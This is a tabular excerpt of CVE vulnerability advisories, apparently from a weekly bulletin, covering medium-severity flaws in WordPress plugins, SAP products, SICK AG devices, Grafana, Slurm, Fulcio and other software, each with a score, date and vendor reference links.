| roxnor--GetGenie AI Content Writer with Keyword Research & SEO Tracking Tools | The GetGenie plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.3.0. This is due to the plugin not properly verifying that a user is authorized to delete a specific post. This makes it possible for authenticated attackers, with Author-level access and above, to delete any post on the WordPress site, including posts authored by other users. | 2026-01-16 | 4.3 | CVE-2026-1003 | https://www.wordfence.com/threat-intel/vulnerabilities/id/38ec647a-3c0c-4d3c-ba34-64c17803867b?source=cve https://plugins.trac.wordpress.org/browser/getgenie/trunk/app/Api/GetGenieChat.php#L153 https://plugins.trac.wordpress.org/changeset/3436920/ |
| saadiqbal--Quick Contact Form | The Quick Contact Form plugin for WordPress is vulnerable to Open Mail Relay in all versions up to, and including, 8.2.6. This is due to the 'qcf_validate_form' AJAX endpoint allowing a user controlled parameter to set the 'from' email address. This makes it possible for unauthenticated attackers to send emails to arbitrary recipients utilizing the server. The information is limited to the contact form submission details. | 2026-01-17 | 5.8 | CVE-2025-12718 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc7ba538-a7ee-48c8-996c-b8db1934fdeb?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433286%40quick-contact-form&new=3433286%40quick-contact-form&sfp_email=&sfph_mail= |
| sablab--Internal Link Builder | The Internal Link Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2025-14725 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1febe071-b296-4958-a9e8-9be9391f2390?source=cve https://plugins.trac.wordpress.org/browser/internal-link-builder/trunk/InternalLinkBuilder.php#L133 |
| Sanluan--PublicCMS | A vulnerability was found in Sanluan PublicCMS up to 5.202506.d. Affected is the function delete of the file publiccms-trade/src/main/java/com/publiccms/controller/web/trade/TradeAddressController.java of the component Trade Address Deletion Endpoint. Performing a manipulation of the argument ids results in improper authorization. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 5.4 | CVE-2026-1112 | VDB-341704 | Sanluan PublicCMS Trade Address Deletion Endpoint TradeAddressController.java delete improper authorization VDB-341704 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732771 | publiccms PublicCMS <= V5.202506.d Insecure Direct Object Reference (IDOR) https://github.com/AnalogyC0de/public_exp/issues/4 |
| Sanluan--PublicCMS | A vulnerability has been found in Sanluan PublicCMS up to 5.202506.d. This impacts the function Save of the file com/publiccms/controller/admin/sys/TaskTemplateAdminController.java of the component Task Template Management Handler. Such manipulation of the argument path leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 4.7 | CVE-2026-1111 | VDB-341703 | Sanluan PublicCMS Task Template Management TaskTemplateAdminController.java save path traversal VDB-341703 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732726 | publiccms PublicCMS <= V5.202506.d Remote Code Execution (RCE) https://github.com/AnalogyC0de/public_exp/issues/2 |
| SAP_SE--Business Server Pages Application (Product Designer Web UI) | SAP Product Designer Web UI of Business Server Pages allows authenticated non-administrative users to access non-sensitive information. This results in a low impact on confidentiality, with no impact on integrity or availability of the application. | 2026-01-13 | 4.3 | CVE-2026-0497 | https://me.sap.com/notes/3677111 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Business Connector | Due to a Cross-Site Scripting (XSS) vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious link. When an unsuspecting user clicks this link, the user may be redirected to a site controlled by the attacker. Successful exploitation could allow the attacker to access or modify information related to the webclient, impacting confidentiality and integrity, with no effect on availability. | 2026-01-13 | 6.1 | CVE-2026-0514 | https://me.sap.com/notes/3666061 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP ERP Central Component and SAP S/4HANA (SAP EHS Management) | Due to missing authorization check in the SAP ERP Central Component (SAP ECC) and SAP S/4HANA (SAP EHS Management), an attacker could extract hardcoded clear-text credentials and bypass the password authentication check by manipulating user parameters. Upon successful exploitation, the attacker can access, modify or delete certain change pointer information within EHS objects in the application which might further affect the subsequent systems. This vulnerability leads to a low impact on confidentiality and integrity of the application with no affect on the availability. | 2026-01-13 | 6.4 | CVE-2026-0503 | https://me.sap.com/notes/3681523 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to upload any file (including script files) without proper file format validation. This has low impact on confidentiality, integrity and availability of the application. | 2026-01-13 | 6.6 | CVE-2026-0496 | https://me.sap.com/notes/3565506 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to send uploaded files to arbitrary emails which could enable effective phishing campaigns. This has low impact on confidentiality, integrity and availability of the application. | 2026-01-13 | 5.1 | CVE-2026-0495 | https://me.sap.com/notes/3565506 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | Due to a Cross-Site Request Forgery (CSRF) vulnerability in SAP Fiori App Intercompany Balance Reconciliation an attacker could execute state?changing actions using an inappropriate request type, this deviation from expected request semantics may allow an attacker to trigger unintended actions on behalf of an authenticated user causing low impact on integrity of the system. This has no impact on confidentiality and availability. | 2026-01-13 | 4.3 | CVE-2026-0493 | https://me.sap.com/notes/3655229 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | Under certain conditions SAP Fiori App Intercompany Balance Reconciliation application allows an attacker to access information which would otherwise be restricted. This has low impact on confidentiality of the application, integrity and availability are not impacted. | 2026-01-13 | 4.3 | CVE-2026-0494 | https://me.sap.com/notes/3655227 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP NetWeaver Enterprise Portal | SAP NetWeaver Enterprise Portal allows an unauthenticated attacker to inject malicious scripts into a URL parameter. The scripts are reflected in the server response and executed in a user's browser when the crafted URL is visited, leading to theft of session information, manipulation of portal content, or user redirection, resulting in a low impact on the application's confidentiality and integrity, with no impact on availability. | 2026-01-13 | 6.1 | CVE-2026-0499 | https://me.sap.com/notes/3687372 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Supplier Relationship Management (SICF Handler in SRM Catalog) | Due to an Open Redirect Vulnerability in SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site.This causes low impact on integrity of the application. Confidentiality and availability are not impacted. | 2026-01-13 | 4.7 | CVE-2026-0513 | https://me.sap.com/notes/3638716 https://url.sap/sapsecuritypatchday |
| SchedMD--Slurm | In SchedMD Slurm before 24.11.5, 24.05.8, and 23.11.11, the accounting system can allow a Coordinator to promote a user to Administrator. | 2026-01-16 | 4.2 | CVE-2025-43904 | https://www.schedmd.com/security-policy/ https://lists.schedmd.com/mailman3/hyperkitty/list/slurm-announce@lists.schedmd.com/message/B73QHKW6TKE2T5KDWVPIWNE5H4KWX667/ |
| Schlix--Schlix CMS | Schlix CMS 2.2.6-6 contains a persistent cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into category titles. Attackers can create a new contact category with a script payload that will execute when the page is viewed by other users. | 2026-01-16 | 6.4 | CVE-2021-47834 | ExploitDB-49837 Vendor Homepage VulnCheck Advisory: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) |
| searchwiz--SearchWiz | The SearchWiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post titles in search results in all versions up to, and including, 1.0.0. This is due to the plugin using `esc_attr()` instead of `esc_html()` when outputting post titles in search results. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in post titles that will execute whenever a user performs a search and views the search results page. | 2026-01-14 | 6.4 | CVE-2026-0694 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e60a315-7f74-4d81-b6d2-ad3d40d489ef?source=cve https://plugins.trac.wordpress.org/browser/searchwiz/trunk/public/class-sw-ajax.php#L616 https://plugins.trac.wordpress.org/browser/searchwiz/tags/1.0.0/public/class-sw-ajax.php#L616 |
| shoheitanaka--PAYGENT for WooCommerce | The PAYGENT for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.4.6. This is due to missing authorization checks on the paygent_check_webhook function combined with the paygent_permission_callback function unconditionally returning true on line 199. This makes it possible for unauthenticated attackers to manipulate payment callbacks and modify order statuses by sending forged payment notifications via the `/wp-json/paygent/v1/check/` endpoint. | 2026-01-17 | 5.3 | CVE-2025-14078 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9de42bd9-a1d2-48f2-a594-4013a9490e25?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/trunk/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199 https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/tags/2.4.2/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433179%40woocommerce-for-paygent-payment-main&new=3433179%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432342%40woocommerce-for-paygent-payment-main&new=3432342%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail= |
| SICK AG--Incoming Goods Suite | The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript. | 2026-01-15 | 6.8 | CVE-2026-22637 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | An access control vulnerability was discovered in Grafana OSS where an Organization administrator could permanently delete the Server administrator account. This vulnerability exists in the DELETE /api/org/users/ endpoint. The vulnerability can be exploited when: 1. An Organization administrator exists 2. The Server administrator is either: - Not part of any organization, or - Part of the same organization as the Organization administrator Impact: - Organization administrators can permanently delete Server administrator accounts - If the only Server administrator is deleted, the Grafana instance becomes unmanageable - No super-user permissions remain in the system - Affects all users, organizations, and teams managed in the instance The vulnerability is particularly serious as it can lead to a complete loss of administrative control over the Grafana instance. | 2026-01-15 | 5.5 | CVE-2026-22640 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | This vulnerability in Grafana's datasource proxy API allows authorization checks to be bypassed by adding an extra slash character in the URL path. Users with minimal permissions could gain unauthorized read access to GET endpoints in Alertmanager and Prometheus datasources. The issue primarily affects datasources that implement route-specific permissions, including Alertmanager and certain Prometheus-based datasources. | 2026-01-15 | 5 | CVE-2026-22641 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | Certain requests pass the authentication token in the URL as string query parameter, making it vulnerable to theft through server logs, proxy logs and Referer headers, which could allow an attacker to hijack the user's session and gain unauthorized access. | 2026-01-15 | 5.3 | CVE-2026-22644 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | The application discloses all used components, versions and license information to unauthenticated actors, giving attackers the opportunity to target known security vulnerabilities of used components. | 2026-01-15 | 5.3 | CVE-2026-22645 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. Fixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01 | 2026-01-15 | 4.3 | CVE-2026-22639 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | An open redirect vulnerability has been identified in Grafana OSS organization switching functionality. Prerequisites for exploitation: - Multiple organizations must exist in the Grafana instance - Victim must be on a different organization than the one specified in the URL | 2026-01-15 | 4.2 | CVE-2026-22642 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | Certain error messages returned by the application expose internal system details that should not be visible to end users, providing attackers with valuable reconnaissance information (like file paths, database errors, or software versions) that can be used to map the application's internal structure and discover other, more critical vulnerabilities. | 2026-01-15 | 4.3 | CVE-2026-22646 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--TDC-X401GL | Firmware update files may expose password hashes for system accounts, which could allow a remote attacker to recover credentials and gain unauthorized access to the device. | 2026-01-15 | 5.3 | CVE-2026-22911 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Improper validation of a login parameter may allow attackers to redirect users to malicious websites after authentication. This can lead to various risk including stealing credentials from unsuspecting users. | 2026-01-15 | 4.3 | CVE-2026-22912 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Improper handling of a URL parameter may allow attackers to execute code in a user's browser after login. This can lead to the extraction of sensitive data. | 2026-01-15 | 4.3 | CVE-2026-22913 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker with limited permissions may still be able to write files to specific locations on the device, potentially leading to system manipulation. | 2026-01-15 | 4.3 | CVE-2026-22914 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker with low privileges may be able to read files from specific directories on the device, potentially exposing sensitive information. | 2026-01-15 | 4.3 | CVE-2026-22915 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker with low privileges may be able to trigger critical system functions such as reboot or factory reset without proper restrictions, potentially leading to service disruption or loss of configuration. | 2026-01-15 | 4.3 | CVE-2026-22916 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Improper input handling in a system endpoint may allow attackers to overload resources, causing a denial of service. | 2026-01-15 | 4.3 | CVE-2026-22917 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | An attacker may exploit missing protection against clickjacking by tricking users into performing unintended actions through maliciously crafted web pages, leading to the extraction of sensitive data. | 2026-01-15 | 4.3 | CVE-2026-22918 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| sigstore--fulcio | Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.5, Fulcio's metaRegex() function uses unanchored regex, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF to arbitrary internal services. Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. This vulnerability is fixed in 1.8.5. | 2026-01-12 | 5.8 | CVE-2026-22772 | https://github.com/sigstore/fulcio/security/advisories/GHSA-59jp-pj84-45mr https://github.com/sigstore/fulcio/commit/eaae2f2be56df9dea5f9b439ec81bedae4c0978d |
| Skyjos--Owlfiles File Manager | Owlfiles File Manager 12.0.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the path parameter in HTTP server endpoints. Attackers can craft URLs targeting the download and list endpoints with embedded script tags to execute arbitrary JavaScript in users' browsers. | 2026-01-13 | 6.2 | CVE-2022-50891 | ExploitDB-51036 Vendor Homepage Official App Store Listing VulnCheck Advisory: Owlfiles File Manager 12.0.1 Cross-Site Scripting via HTTP Server |
| SMEWebify--WebErpMesv2 | WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, WebErpMesv2 contains a file upload validation bypass vulnerability in multiple controllers that allows authenticated users to upload arbitrary files, including PHP scripts, leading to Remote Code Execution (RCE). This vulnerability is identical in nature to CVE-2025-52130 but exists in different code locations that were not addressed by the original fix. This vulnerability is fixed in 1.19. | 2026-01-12 | 5.4 | CVE-2026-22789 | https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-64rv-f829-x6m4 https://github.com/SMEWebify/WebErpMesv2/commit/c9e7f4a85aeb774a0ea4b61ad57a51b941166b69 |
| smings--LEAV Last Email Address Validator | The LEAV Last Email Address Validator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions <= 1.7.1. This is due to missing or incorrect nonce validation on the display_settings_page function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-16 | 4.3 | CVE-2025-14853 | https://www.wordfence.com/threat-intel/vulnerabilities/id/93db56df-d21b-4788-84b2-7b28641b5a7a?source=cve https://plugins.trac.wordpress.org/browser/last-email-address-validator/trunk/includes/leav-settings-page.inc.php#L66 https://plugins.trac.wordpress.org/browser/last-email-address-validator/trunk/includes/leav-settings-page.inc.php#L2183 https://plugins.trac.wordpress.org/browser/last-email-address-validator/trunk/includes/leav-settings-page.inc.php#L257 |
| smub--All in One SEO Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic | The All in One SEO - Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `/aioseo/v1/ai/credits` REST route in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disclose the global AI access token. | 2026-01-16 | 4.3 | CVE-2025-14384 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f47d53e1-42ac-425e-a6f2-901a6d26845d?source=cve https://plugins.trac.wordpress.org/changeset/3435276/all-in-one-seo-pack |
| socialchampio--SocialChamp with WordPress | The SocialChamp with WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.3. This is due to missing nonce validation on the wpsc_settings_tab_menu function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-14846 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bdbb660b-19aa-4c68-865c-0a51b85d1e5a?source=cve https://plugins.trac.wordpress.org/browser/auto-post-to-social-media-wp-to-social-champ/tags/1.3.3/admin/class-wp-socialchamp-settings-init.php#L157 |
| softwarepub--hermes | hermes is an implementation of the HERMES workflow to automatize software publication with rich metadata. From 0.8.1 to before 0.9.1, hermes subcommands take arbitrary options under the -O argument. These have been logged in raw form. If users provide sensitive data such as API tokens (e.g., via hermes deposit -O invenio_rdm.auth_token SECRET), these are written to the log file in plain text, making them available to whoever can access the log file. This vulnerability is fixed in 0.9.1. | 2026-01-12 | 5.9 | CVE-2026-22798 | https://github.com/softwarepub/hermes/security/advisories/GHSA-jm5j-jfrm-hm23 https://github.com/softwarepub/hermes/commit/7f64f102e916c76dc44404b77ab2a80f5a4e59b1 https://github.com/softwarepub/hermes/commit/90cb86acd026e7841f2539ae7a1b284a7f263514 |
| specialk--User Submitted Posts Enable Users to Submit Posts from the Front End | The User Submitted Posts - Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'usp_access' shortcode in all versions up to, and including, 20260110 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-16 | 6.4 | CVE-2026-0913 | https://www.wordfence.com/threat-intel/vulnerabilities/id/85bf7a1b-3c54-40c9-8f19-fcb9dd478a0e?source=cve https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20251210/library/shortcode-access.php#L20 https://plugins.trac.wordpress.org/changeset/3439027/ |
| Spring--CLI VSCode Extension | The VSCode extension for Spring CLI are vulnerable to command injection, resulting in command execution on the users machine. | 2026-01-14 | 6.8 | CVE-2026-22718 | https://spring.io/security/cve-2026-22718 |
| stylemix--Cost Calculator Builder | The Cost Calculator Builder plugin for WordPress is vulnerable to Unauthenticated Payment Status Bypass in all versions up to, and including, 3.6.9 only when used in combination with Cost Calculator Builder PRO. This is due to the complete_payment AJAX action being registered via wp_ajax_nopriv, making it accessible to unauthenticated users, and the complete() function only verifying a nonce without checking user capabilities or order ownership. Since nonces are exposed to all visitors via window.ccb_nonces in the page source, any unauthenticated attacker can mark any order's payment status as "completed" without actual payment. | 2026-01-16 | 5.3 | CVE-2025-14757 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b8415e5f-17a4-425c-ac28-5dd886d1bcf1?source=cve https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBOrderController.php#L408 https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBAjaxAction.php#L98 https://plugins.trac.wordpress.org/changeset/3437516/cost-calculator-builder/trunk/includes/classes/CCBOrderController.php?old=3426823&old_path=cost-calculator-builder%2Ftrunk%2Fincludes%2Fclasses%2FCCBOrderController.php |
| sweetdaisy86--RepairBuddy Repair Shop CRM & Booking Plugin for WordPress | The RepairBuddy - Repair Shop CRM & Booking Plugin for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference due to missing capability checks on the wc_upload_and_save_signature_handler function in all versions up to, and including, 4.1116. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary signatures to any order in the system, potentially modifying order metadata and triggering unauthorized status changes. | 2026-01-17 | 5.3 | CVE-2026-0820 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b2ad299-03b1-4b9e-a241-d2ad2d85c3ac?source=cve https://plugins.trac.wordpress.org/browser/computer-repair-shop/trunk/lib/includes/classes/class-wcrb_signature.php#L562 https://plugins.trac.wordpress.org/browser/computer-repair-shop/tags/4.1116/lib/includes/classes/class-wcrb_signature.php#L562 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3436356%40computer-repair-shop&new=3436356%40computer-repair-shop&sfp_email=&sfph_mail= |
| Syed Balkhi--WPForms | WPForms 1.7.8 contains a cross-site scripting vulnerability in the slider import search feature and tab parameter. Attackers can inject malicious scripts through the ListTable.php endpoint to execute arbitrary JavaScript in victim's browser. | 2026-01-13 | 6.1 | CVE-2020-36919 | ExploitDB-51152 WPForms Lite Plugin Homepage VulnCheck Advisory: WPForms 1.7.8 - Cross-Site Scripting (XSS) |
| techknowprime--Responsive Accordion Slider | The Responsive Accordion Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'resp_accordion_silder_save_images' function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify any slider's image metadata including titles, descriptions, alt text, and links. | 2026-01-14 | 4.3 | CVE-2026-0635 | https://www.wordfence.com/threat-intel/vulnerabilities/id/55cfb2c6-ca3f-45b7-8cd9-a5a1c3783ae0?source=cve https://plugins.trac.wordpress.org/browser/responsive-accordion-slider/tags/1.2.2/includes/admin/class-ras-admin.php#L101 |
| Testa--Testa | Testa 3.5.1 contains a reflected cross-site scripting vulnerability in the login.php redirect parameter that allows attackers to inject malicious scripts. Attackers can craft a specially encoded payload in the redirect parameter to execute arbitrary JavaScript in victim's browser context. | 2026-01-13 | 6.1 | CVE-2022-50896 | ExploitDB-51023 Archived Product Homepage VulnCheck Advisory: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) |
| thimpress--Thim Blocks | The Gutenberg Thim Blocks - Page Builder, Gutenberg Blocks for the Block Editor plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 1.0.1. This is due to insufficient path validation in the server-side rendering of the thim-blocks/icon block. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server via the 'iconSVG' parameter, which can contain sensitive information such as wp-config.php. | 2026-01-17 | 6.5 | CVE-2025-13725 | https://www.wordfence.com/threat-intel/vulnerabilities/id/80de464f-a4b0-4aaf-8869-f8d29a422bdb?source=cve https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92 https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92 https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97 https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3424998%40thim-blocks&new=3424998%40thim-blocks&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419638%40thim-blocks&new=3419638%40thim-blocks&sfp_email=&sfph_mail= |
